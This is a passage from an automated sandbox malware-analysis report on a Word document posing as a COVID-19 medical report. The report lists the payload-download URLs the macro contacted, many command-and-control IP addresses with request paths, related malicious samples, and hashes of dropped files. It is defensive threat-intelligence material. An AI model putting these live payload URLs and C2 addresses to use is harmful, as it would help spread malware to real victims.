                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000005.00000002.2098069064.0000000002400000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2122352359.0000000002820000.00000002.00000001.sdmpfalse
                                      high
                                      http://gocphongthe.com/wp-content/lMMC/powershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmptrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#powershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      http://investor.msn.com/rundll32.exe, 00000006.00000002.2111782640.0000000001C70000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110651832.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2121577503.0000000001E20000.00000002.00000001.sdmp, rundll32.exe, 00000009.00000002.2131336460.0000000001E20000.00000002.00000001.sdmpfalse
                                        high
                                        http://cambiasuhistoria.growlab.es/wp-content/hGhY2/powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmpfalse
                                          high
                                          http://www.letscompareonline.com/de.letscompareonline.com/wYd/powershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2106741601.0000000003A69000.00000004.00000001.sdmptrue
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://sectigo.com/CPS0Dpowershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          unknown
                                          http://www.piriform.com/ccleanerhttp://www.piriform.com/cclea7powershell.exe, 00000005.00000002.2097432715.00000000003A5000.00000004.00000020.sdmpfalse
                                            high
                                            http://www.piriform.com/ccleanerpowershell.exe, 00000005.00000002.2097432715.00000000003A5000.00000004.00000020.sdmpfalse
                                              high
                                              http://www.%s.comPApowershell.exe, 00000005.00000002.2098069064.0000000002400000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2122352359.0000000002820000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              low
                                              http://cab.mHpowershell.exe, 00000005.00000002.2106818585.0000000003B54000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://cab.mykfn.compowershell.exe, 00000005.00000002.2099206859.0000000002EA1000.00000004.00000001.sdmptrue
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://vanddnabhargave.compowershell.exe, 00000005.00000002.2106822436.0000000003B58000.00000004.00000001.sdmptrue
                                              • Avira URL Cloud: safe
                                              unknown

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              194.4.58.192
                                              unknownKazakhstan
                                              202958HOSTER-KZtrue
                                              49.205.182.134
                                              unknownIndia
                                              18209BEAMTELE-AS-APAtriaConvergenceTechnologiespvtltdINtrue
                                              95.9.5.93
                                              unknownTurkey
                                              9121TTNETTRtrue
                                              185.201.9.197
                                              unknownGermany
                                              47583AS-HOSTINGERLTtrue
                                              115.94.207.99
                                              unknownKorea Republic of
                                              3786LGDACOMLGDACOMCorporationKRtrue
                                              71.72.196.159
                                              unknownUnited States
                                              10796TWC-10796-MIDWESTUStrue
                                              70.92.118.112
                                              unknownUnited States
                                              10796TWC-10796-MIDWESTUStrue
                                              70.183.211.3
                                              unknownUnited States
                                              22773ASN-CXA-ALL-CCI-22773-RDCUStrue
                                              12.175.220.98
                                              unknownUnited States
                                              7018ATT-INTERNET4UStrue
                                              200.116.145.225
                                              unknownColombia
                                              13489EPMTelecomunicacionesSAESPCOtrue
                                              190.251.200.206
                                              unknownColombia
                                              13489EPMTelecomunicacionesSAESPCOtrue
                                              138.68.87.218
                                              unknownUnited States
                                              14061DIGITALOCEAN-ASNUStrue
                                              172.105.13.66
                                              unknownUnited States
                                              63949LINODE-APLinodeLLCUStrue
                                              220.245.198.194
                                              unknownAustralia
                                              7545TPG-INTERNET-APTPGTelecomLimitedAUtrue
                                              104.131.11.150
                                              unknownUnited States
                                              14061DIGITALOCEAN-ASNUStrue
                                              162.241.204.233
                                              unknownUnited States
                                              46606UNIFIEDLAYER-AS-1UStrue
                                              176.111.60.55
                                              unknownUkraine
                                              24703UN-UKRAINE-ASKievUkraineUAtrue
                                              24.178.90.49
                                              unknownUnited States
                                              20115CHARTER-20115UStrue
                                              94.23.237.171
                                              unknownFrance
                                              16276OVHFRtrue
                                              192.185.52.115
                                              unknownUnited States
                                              46606UNIFIEDLAYER-AS-1UStrue
                                              187.161.206.24
                                              unknownMexico
                                              11888TelevisionInternacionalSAdeCVMXtrue
                                              41.185.28.84
                                              unknownSouth Africa
                                              36943GridhostZAtrue
                                              78.182.254.231
                                              unknownTurkey
                                              9121TTNETTRtrue
                                              194.190.67.75
                                              unknownRussian Federation
                                              50804BESTLINE-NET-PROTVINORUtrue
                                              108.53.88.101
                                              unknownUnited States
                                              701UUNETUStrue
                                              186.74.215.34
                                              unknownPanama
                                              11556CableWirelessPanamaPAtrue
                                              109.116.245.80
                                              unknownItaly
                                              30722VODAFONE-IT-ASNITtrue
                                              161.0.153.60
                                              unknownHaiti
                                              27800DigicelTrinidadandTobagoLtdTTtrue
                                              202.134.4.216
                                              unknownIndonesia
                                              7713TELKOMNET-AS-APPTTelekomunikasiIndonesiaIDtrue
                                              120.150.218.241
                                              unknownAustralia
                                              1221ASN-TELSTRATelstraCorporationLtdAUtrue
                                              202.134.4.211
                                              unknownIndonesia
                                              7713TELKOMNET-AS-APPTTelekomunikasiIndonesiaIDtrue
                                              87.106.139.101
                                              unknownGermany
                                              8560ONEANDONE-ASBrauerstrasse48DEtrue
                                              173.70.61.180
                                              unknownUnited States
                                              701UUNETUStrue
                                              78.188.225.105
                                              unknownTurkey
                                              9121TTNETTRtrue
                                              74.128.121.17
                                              unknownUnited States
                                              10796TWC-10796-MIDWESTUStrue
                                              62.75.141.82
                                              unknownGermany
                                              8972GD-EMEA-DC-SXB1DEtrue
                                              24.69.65.8
                                              unknownCanada
                                              6327SHAWCAtrue
                                              119.59.116.21
                                              unknownThailand
                                              56067METRABYTE-TH453LadplacoutJorakhaebuaTHtrue
                                              37.139.21.175
                                              unknownNetherlands
                                              14061DIGITALOCEAN-ASNUStrue
                                              98.109.133.80
                                              unknownUnited States
                                              701UUNETUStrue
                                              95.213.236.64
                                              unknownRussian Federation
                                              49505SELECTELRUtrue
                                              46.105.131.79
                                              unknownFrance
                                              16276OVHFRtrue
                                              166.62.28.130
                                              unknownUnited States
                                              26496AS-26496-GO-DADDY-COM-LLCUStrue
                                              50.116.111.59
                                              unknownUnited States
                                              46606UNIFIEDLAYER-AS-1UStrue
                                              188.165.214.98
                                              unknownFrance
                                              16276OVHFRtrue
                                              69.38.130.14
                                              unknownUnited States
                                              26878TWRS-NYCUStrue
                                              120.150.60.189
                                              unknownAustralia
                                              1221ASN-TELSTRATelstraCorporationLtdAUtrue
                                              172.125.40.123
                                              unknownUnited States
                                              7018ATT-INTERNET4UStrue
                                              180.222.161.85
                                              unknownAustralia
                                              45510TELCOINABOX-AULevel109HunterStreetAUtrue
                                              110.145.11.73
                                              unknownAustralia
                                              1221ASN-TELSTRATelstraCorporationLtdAUtrue
                                              172.86.188.251
                                              unknownCanada
                                              32489AMANAHA-NEWCAtrue
                                              157.245.99.39
                                              unknownUnited States
                                              14061DIGITALOCEAN-ASNUStrue
                                              115.21.224.117
                                              unknownKorea Republic of
                                              4766KIXS-AS-KRKoreaTelecomKRtrue
                                              167.114.153.111
                                              unknownCanada
                                              16276OVHFRtrue
                                              203.153.216.189
                                              unknownIndonesia
                                              45291SURF-IDPTSurfindoNetworkIDtrue
                                              2.58.16.89
                                              unknownLatvia
                                              64421SERTEX-ASLVtrue
                                              62.171.142.179
                                              unknownUnited Kingdom
                                              51167CONTABODEtrue
                                              78.189.148.42
                                              unknownTurkey
                                              9121TTNETTRtrue
                                              85.105.205.77
                                              unknownTurkey
                                              9121TTNETTRtrue
                                              123.176.25.234
                                              unknownMaldives
                                              7642DHIRAAGU-MV-APDHIVEHIRAAJJEYGEGULHUNPLCMVtrue
                                              75.109.111.18
                                              unknownUnited States
                                              19108SUDDENLINK-COMMUNICATIONSUStrue
                                              66.57.108.14
                                              unknownUnited States
                                              11426TWC-11426-CAROLINASUStrue
                                              50.91.114.38
                                              unknownUnited States
                                              33363BHN-33363UStrue
                                              78.24.219.147
                                              unknownRussian Federation
                                              29182THEFIRST-ASRUtrue
                                              24.179.13.119
                                              unknownUnited States
                                              20115CHARTER-20115UStrue
                                              110.142.236.207
                                              unknownAustralia
                                              1221ASN-TELSTRATelstraCorporationLtdAUtrue
                                              139.99.158.11
                                              unknownCanada
                                              16276OVHFRtrue
                                              190.103.228.24
                                              unknownArgentina
                                              27983RedIntercableDigitalSAARtrue
                                              181.165.68.127
                                              unknownArgentina
                                              10318TelecomArgentinaSAARtrue
                                              121.124.124.40
                                              unknownKorea Republic of
                                              9318SKB-ASSKBroadbandCoLtdKRtrue
                                              139.59.60.244
                                              unknownSingapore
                                              14061DIGITALOCEAN-ASNUStrue
                                              61.19.246.238
                                              unknownThailand
                                              9335CAT-CLOUD-APCATTelecomPublicCompanyLimitedTHtrue
                                              89.106.251.163
                                              unknownRussian Federation
                                              5563URALUralRegionalNetRUtrue
                                              168.235.67.138
                                              unknownUnited States
                                              3842RAMNODEUStrue
                                              136.244.110.184
                                              unknownUnited States
                                              20473AS-CHOOPAUStrue
                                              197.211.245.21
                                              unknownMauritius
                                              30969ZOL-ASGBtrue
                                              79.130.130.240
                                              unknownGreece
                                              6799OTENET-GRAthens-GreeceGRtrue
                                              188.219.31.12
                                              unknownItaly
                                              30722VODAFONE-IT-ASNITtrue
                                              75.113.193.72
                                              unknownUnited States
                                              33363BHN-33363UStrue
                                              217.20.166.178
                                              unknownUkraine
                                              1820WNETUStrue
                                              74.208.45.104
                                              unknownUnited States
                                              8560ONEANDONE-ASBrauerstrasse48DEtrue
                                              134.209.144.106
                                              unknownUnited States
                                              14061DIGITALOCEAN-ASNUStrue
                                              59.21.235.119
                                              unknownKorea Republic of
                                              4766KIXS-AS-KRKoreaTelecomKRtrue
                                              93.146.48.84
                                              unknownItaly
                                              30722VODAFONE-IT-ASNITtrue
                                              139.162.60.124
                                              unknownNetherlands
                                              63949LINODE-APLinodeLLCUStrue
                                              172.104.97.173
                                              unknownUnited States
                                              63949LINODE-APLinodeLLCUStrue
                                              166.62.10.32
                                              unknownUnited States
                                              26496AS-26496-GO-DADDY-COM-LLCUStrue
                                              69.49.88.46
                                              unknownUnited States
                                              33734MPW-MACHLINK-NETUStrue
                                              24.164.79.147
                                              unknownUnited States
                                              10796TWC-10796-MIDWESTUStrue
                                              74.58.215.226
                                              unknownCanada
                                              5769VIDEOTRONCAtrue
                                              37.187.72.193
                                              unknownFrance
                                              16276OVHFRtrue
                                              195.159.28.230
                                              unknownNorway
                                              2116ASN-CATCHCOMNOtrue
                                              51.89.36.180
                                              unknownFrance
                                              16276OVHFRtrue
                                              85.105.111.166
                                              unknownTurkey
                                              9121TTNETTRtrue
                                              190.240.194.77
                                              unknownColombia
                                              13489EPMTelecomunicacionesSAESPCOtrue
                                              109.74.5.95
                                              unknownSweden
                                              43948GLESYS-ASSEtrue
                                              79.137.83.50
                                              unknownFrance
                                              16276OVHFRtrue
                                              174.118.202.24
                                              unknownCanada
                                              812ROGERS-COMMUNICATIONSCAtrue
                                              181.171.209.241
                                              unknownArgentina
                                              10318TelecomArgentinaSAARtrue
                                              89.216.122.92
                                              unknownSerbia
                                              31042SERBIA-BROADBAND-ASSerbiaBroadBand-SrpskeKablovskemrezetrue

                                              General Information

                                              Joe Sandbox Version:31.0.0 Emerald
                                              Analysis ID:354471
                                              Start date:17.02.2021
                                              Start time:22:55:49
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 7m 11s
                                              Hypervisor based Inspection enabled:false
                                              Report type:light
                                              Sample file name:IU-8549 Medical report COVID-19.doc
                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                              Number of analysed new started processes analysed:15
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • GSI enabled (VBA)
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winDOC@20/8@6/100
                                              EGA Information:
                                              • Successful, ratio: 85.7%
                                              HDC Information:
                                              • Successful, ratio: 31.6% (good quality ratio 29.4%)
                                              • Quality average: 70.8%
                                              • Quality standard deviation: 26.8%
                                              HCA Information:
                                              • Successful, ratio: 78%
                                              • Number of executed functions: 0
                                              • Number of non-executed functions: 0
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Found application associated with file extension: .doc
                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                              • Found warning dialog
                                              • Click Ok
                                              • Attach to Office via COM
                                              • Scroll down
                                              • Close Viewer
                                              Warnings:
                                              Show All
                                              • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                              • TCP Packets have been reduced to 100
                                              • Execution Graph export aborted for target powershell.exe, PID 1320 because it is empty
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              22:56:35API Interceptor1x Sleep call for process: msg.exe modified
                                              22:56:36API Interceptor89x Sleep call for process: powershell.exe modified
                                              22:56:56API Interceptor253x Sleep call for process: rundll32.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              115.94.207.99https://contentsxx.xsrv.jp/academia/parts_service/7xg/Get hashmaliciousBrowse
                                              • 115.94.207.99:443/OUnj/nu5Sn5pH6W/XCxNN4goRNgqaQshv/BH9p/alZ3dnjhwqocs6Wj/
                                              71.72.196.1593Zn3npGt2R.docGet hashmaliciousBrowse
                                              • 71.72.196.159/jzbe8u/
                                              FILE-092020.docGet hashmaliciousBrowse
                                              • 71.72.196.159/Asgu9G/UPAJk1H/k1wB2h2IhMQGy9M4O/CwukNROTLhDmT5iz7yr/QNOGQRhP/
                                              X5w6zls.exeGet hashmaliciousBrowse
                                              • 71.72.196.159/YmBvqXK/A1bXsLoMSYg/i0gaWBtL9c/yD6C9feh/
                                              #U5909#U531620.09.docGet hashmaliciousBrowse
                                              • 71.72.196.159/HisuDo3My4/
                                              #U5909#U531620-09.docGet hashmaliciousBrowse
                                              • 71.72.196.159/IEHZ5/HVlPRDwFoj/OuQtgxrIROu80/9t0syM1s3J/
                                              BCRYO2020.09.19.docGet hashmaliciousBrowse
                                              • 71.72.196.159/UdroxO4ouHCZo3/SPUpyAXBlZAJ/kR4LZr6qJHOM3/9tr1e4XNde6jxg22B/j2TVTGpcHCpnic1/
                                              drdgPfOU36.exeGet hashmaliciousBrowse
                                              • 71.72.196.159/6YX6sQtKK6MLta/TbNsyU7EbVPMjL/0MoOi2xkKCNW7y67b/USvDoTSxSZ/BulSaK/
                                              cC.exeGet hashmaliciousBrowse
                                              • 71.72.196.159/LLRDDCScx1Byk2D/krMwjOaF56Uc9Il6eMD/WuP6hJZcQa4/5p5T7L/
                                              #U304b#U3089#U306e#U5909#U66f419.docGet hashmaliciousBrowse
                                              • 71.72.196.159/3oAMQ7MNt66lIE8EI/DizHtXLtgQHqx/U2NH3hw0GWPotmCV/dMZCjcyGRF/qUw6hgI/FwMSWVK67N4mSEoC/
                                              LTB.docGet hashmaliciousBrowse
                                              • 71.72.196.159/QxJ68bj/OcYZ8J9RWfz7qwepeY/7Zys/K1Bpu/5CRfSZCJqSBtKcz/dhIXBeS6vLJR/
                                              #U6700#U65b0#U306e#U69cb#U9020#U56f3.docGet hashmaliciousBrowse
                                              • 71.72.196.159/JMk30NNrO1ReTb/6XR5dMIuJFNZfcR/yg0fR2fj6mXvduKb/
                                              HROF2020.docGet hashmaliciousBrowse
                                              • 71.72.196.159/EMc53XBYQbN5Jl/
                                              #U304b#U3089#U306e#U5909#U66f49#U6708.docGet hashmaliciousBrowse
                                              • 71.72.196.159/1ieklOTBS/ak8HNcj/
                                              DAT_2020_09_7444352632.docGet hashmaliciousBrowse
                                              • 71.72.196.159/cv2mWGF5/67dqj/ZkWPeQbBjvdWajsuvx/lYL2/TljK64Me1bfzHxBI/
                                              Dokumentation_FC_41232269.docGet hashmaliciousBrowse
                                              • 71.72.196.159/ejSg6gT/pSnsS3gAqTGFHUm9V/Jg8Kv3cnCG2Miq94/Sf9xZ/
                                              BIZ_18_09_2020_4070550449.docGet hashmaliciousBrowse
                                              • 71.72.196.159/tiVhuDLoHxS/G2H7AH/
                                              Betrag_2020_09_4036385628.docGet hashmaliciousBrowse
                                              • 71.72.196.159/RQWehX/fgtv5/htJbK7vQCVUSRwZJeE/
                                              SCNVS2020.09.docGet hashmaliciousBrowse
                                              • 71.72.196.159/b9v6oT61Mzfa1oQAP/IIlXlIMvsnl/
                                              ZZLEJDXT8LH-20200918.docGet hashmaliciousBrowse
                                              • 71.72.196.159/v4zRqawC6/myK9u1BaFBM0ak/
                                              #U5909#U531609_18.docGet hashmaliciousBrowse
                                              • 71.72.196.159/w5aqN3cMRoz5Eq/

                                              Domains

                                              No context

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              HOSTER-KZ0217_1737094153981.docGet hashmaliciousBrowse
                                              • 185.100.65.29
                                              Hs52qascx.dllGet hashmaliciousBrowse
                                              • 185.100.65.29
                                              0211_38602014674781.docGet hashmaliciousBrowse
                                              • 185.100.65.29
                                              0210_1723194332604.docGet hashmaliciousBrowse
                                              • 185.100.65.29
                                              Wh102yYa.dllGet hashmaliciousBrowse
                                              • 185.100.65.29
                                              Wh102yYa.dllGet hashmaliciousBrowse
                                              • 185.100.65.29
                                              0204_170387664101931.docGet hashmaliciousBrowse
                                              • 185.100.65.29
                                              0204_47091115550132.docGet hashmaliciousBrowse
                                              • 185.100.65.29
                                              Wh102yYa.dllGet hashmaliciousBrowse
                                              • 185.100.65.29
                                              2e00000.dllGet hashmaliciousBrowse
                                              • 185.100.65.29
                                              0fiasS.dllGet hashmaliciousBrowse
                                              • 185.100.65.29
                                              6gdwwv.exeGet hashmaliciousBrowse
                                              • 185.100.65.29
                                              0fiasS.dllGet hashmaliciousBrowse
                                              • 185.100.65.29
                                              http://foodlike.kz/templates/QUJOpdohWbgqcRtXl3uAR0twmMS59eLk1cnA6P2oA15NZcjPZPj0GO2DF/Get hashmaliciousBrowse
                                              • 185.98.5.123
                                              Offer10044885_BMElectricalWholesaleLtd._8_05_2020.xlsmGet hashmaliciousBrowse
                                              • 185.98.7.168
                                              dWn0lheLfE.exeGet hashmaliciousBrowse
                                              • 194.4.56.252
                                              Enpn2Assf0.exeGet hashmaliciousBrowse
                                              • 194.4.56.252
                                              ttt.exeGet hashmaliciousBrowse
                                              • 185.129.49.19
                                              http://vostok-avto.kz/robots.txtGet hashmaliciousBrowse
                                              • 185.98.6.98
                                              hancitor.docGet hashmaliciousBrowse
                                              • 185.111.107.43
                                              BEAMTELE-AS-APAtriaConvergenceTechnologiespvtltdINvrhiyc.exeGet hashmaliciousBrowse
                                              • 183.82.229.11
                                              ucrcdh.exeGet hashmaliciousBrowse
                                              • 183.82.229.11
                                              430#U0437.jsGet hashmaliciousBrowse
                                              • 49.207.1.12
                                              http://jimmyjohansson.net/3IMCCRNQ/SWIFT/US/Get hashmaliciousBrowse
                                              • 183.82.101.78
                                              RZ_RN_8536339_24_08_2018.docGet hashmaliciousBrowse
                                              • 183.82.101.78
                                              RZ_RN_8536339_24_08_2018.docGet hashmaliciousBrowse
                                              • 183.82.101.78
                                              Invoice 0007699180.docGet hashmaliciousBrowse
                                              • 183.82.101.78
                                              Invoice 0007699180.docGet hashmaliciousBrowse
                                              • 183.82.101.78
                                              Invoice 0007699180.docGet hashmaliciousBrowse
                                              • 183.82.101.78
                                              Invoice 0007699180.docGet hashmaliciousBrowse
                                              • 183.82.101.78
                                              Invoice 0007699180.docGet hashmaliciousBrowse
                                              • 183.82.101.78
                                              Invoice 0007699180.docGet hashmaliciousBrowse
                                              • 183.82.101.78
                                              http://elista-gs.ru/doc/En_us/Invoice-receiptGet hashmaliciousBrowse
                                              • 183.82.101.78
                                              culturemetagen.exeGet hashmaliciousBrowse
                                              • 183.82.120.85
                                              jerseythunk.exeGet hashmaliciousBrowse
                                              • 183.82.120.85
                                              TTNETTRIo8ic2291n.docGet hashmaliciousBrowse
                                              • 81.215.230.173
                                              yVn2ywuhEC.exeGet hashmaliciousBrowse
                                              • 78.182.153.125
                                              oHqMFmPndx.exeGet hashmaliciousBrowse
                                              • 78.181.200.182
                                              svchost.exeGet hashmaliciousBrowse
                                              • 78.162.183.87
                                              34ArXmP6.exeGet hashmaliciousBrowse
                                              • 95.12.26.17
                                              1Jx5JnUZW9.exeGet hashmaliciousBrowse
                                              • 95.7.8.37
                                              nFZB1yk7r2.exeGet hashmaliciousBrowse
                                              • 95.7.8.37
                                              utox.exeGet hashmaliciousBrowse
                                              • 78.188.107.43
                                              sample2.dllGet hashmaliciousBrowse
                                              • 78.161.228.73
                                              sample1.dllGet hashmaliciousBrowse
                                              • 85.105.29.218
                                              CA1eebsu.exeGet hashmaliciousBrowse
                                              • 81.215.78.147
                                              form.docGet hashmaliciousBrowse
                                              • 78.188.225.105
                                              December Invoice.docGet hashmaliciousBrowse
                                              • 78.188.225.105
                                              https://caminhodosveadeiros.com.br/h/Ld51n5yo2sVpA9ix2ZHZLqX7/Get hashmaliciousBrowse
                                              • 78.188.225.105
                                              https://praticideas.net/wp-content/5nxk9R7pIxOAP8bYYojGh4Rl69ZT6uMTycnblB4OUEIzYvRuc22u0pyZbSvqTNlp7/Get hashmaliciousBrowse
                                              • 78.188.225.105
                                              MH1809380042BB.docGet hashmaliciousBrowse
                                              • 78.188.225.105
                                              BL9908763287SF_10.docGet hashmaliciousBrowse
                                              • 78.188.225.105
                                              Form.docGet hashmaliciousBrowse
                                              • 78.188.225.105
                                              http://creationskateboards.com/satori_wheels_spencer_hamilton/WRLUbPer/Get hashmaliciousBrowse
                                              • 78.188.225.105
                                              http://avanttipisos.com.br/catalogo-virtual/i1XnbBRzXXXrqGLfBZ3UNn6Yjh1mubdZKDm48wvQD3thzthxMysXGet hashmaliciousBrowse
                                              • 78.188.225.105

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{452ACF7A-211A-44E2-8F1B-AC77A8685DB1}.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1536
                                              Entropy (8bit):1.3555252507007245
                                              Encrypted:false
                                              SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbO:IiiiiiiiiifdLloZQc8++lsJe1MzR
                                              MD5:9F85A426A7C06D286F10DC7B9C06FFF5
                                              SHA1:218864C86F0788C9CD71EF1505D3A38C522DEA07
                                              SHA-256:D4D1C027A1BAEF0AEDA2242980DBE4269FF390485C93C9FFE09AFFAC3D902044
                                              SHA-512:F09712C2E11AC9236A7FD6963E145D02F5238D5E3F37D75CCF4D4963B1D8F34C70727F620B81A708089349ECF6A30DFEBA20B2179E79FD103C17F53CABD8ED75
                                              Malicious:false
                                              Reputation:low
                                              Preview: ..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B4FD77F3-97C0-4A14-814E-1968BCE52029}.tmp
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1024
                                              Entropy (8bit):0.05390218305374581
                                              Encrypted:false
                                              SSDEEP:3:ol3lYdn:4Wn
                                              MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                              SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                              SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                              SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                              Malicious:false
                                              Reputation:high, very likely benign file
                                              Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\IU-8549 Medical report COVID-19.LNK
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Aug 26 14:08:15 2020, atime=Thu Feb 18 05:56:32 2021, length=172032, window=hide
                                              Category:dropped
                                              Size (bytes):2238
                                              Entropy (8bit):4.557455295271099
                                              Encrypted:false
                                              SSDEEP:48:8mm/XT0jF1oe/7JO8e/k+Qh2mm/XT0jF1oe/7JO8e/k+Q/:85/XojF1oe08e8+Qh25/XojF1oe08e89
                                              MD5:C8E751FB9A57C3D271680235A84491E9
                                              SHA1:5DD21C8CCDB4B52C1B8790B285107DC734206C61
                                              SHA-256:790F5177DB2CC779F97704E7609BF1FF5431F91612C00167F1BD1056A59755DB
                                              SHA-512:77B591590030F43CF9388D5634DBBAA8F90C4FC50F2A05F4FF6D26527CCD6B634D59431B7322BA4E6F0DFD9B139410562F24F706625757D185BE32B81B6F91EC
                                              Malicious:false
                                              Reputation:low
                                              Preview: L..................F.... ....7h..{...7h..{...%.0.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....RR.7 .IU-854~1.DOC..t.......Q.y.Q.y*...8.....................I.U.-.8.5.4.9. .M.e.d.i.c.a.l. .r.e.p.o.r.t. .C.O.V.I.D.-.1.9...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\818225\Users.user\Desktop\IU-8549 Medical report COVID-19.doc.:.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.U.-.8.5.4.9. .M.e.d.i.c.a.l. .r.e.p.o.r.t. .C.O.V.I.D.-.1.9...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1
                                              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):131
                                              Entropy (8bit):4.987781475184533
                                              Encrypted:false
                                              SSDEEP:3:M1R70ILQSjmIfFu4o09dE0ILQSjmIfFu4omX1R70ILQSjmIfFu4ov:Mb0ILyIfjnE0ILyIfj10ILyIfjy
                                              MD5:C9F0C74D1BCAF808FB96B6D9DD400032
                                              SHA1:A89073DBBDD26CFE3DA92680022E006B5FB69EF2
                                              SHA-256:1DDF70A865248BDA1FC8C3815FE3DE223492A35EDCA8E8BB5B052DE69B87C262
                                              SHA-512:BBBF845983C9AA5E2FA9F25A99ACABD032118CD13E7A097C4E4B07F7B855AF4F10616368C7C0D88AC4B35FA386FDB3BC3E6A7A4BBBDC759A326CDD24967F15FD
                                              Malicious:false
                                              Preview: [doc]..IU-8549 Medical report COVID-19.LNK=0..IU-8549 Medical report COVID-19.LNK=0..[doc]..IU-8549 Medical report COVID-19.LNK=0..
                                              C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                              Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):162
                                              Entropy (8bit):2.431160061181642
                                              Encrypted:false
                                              SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                              MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                              SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
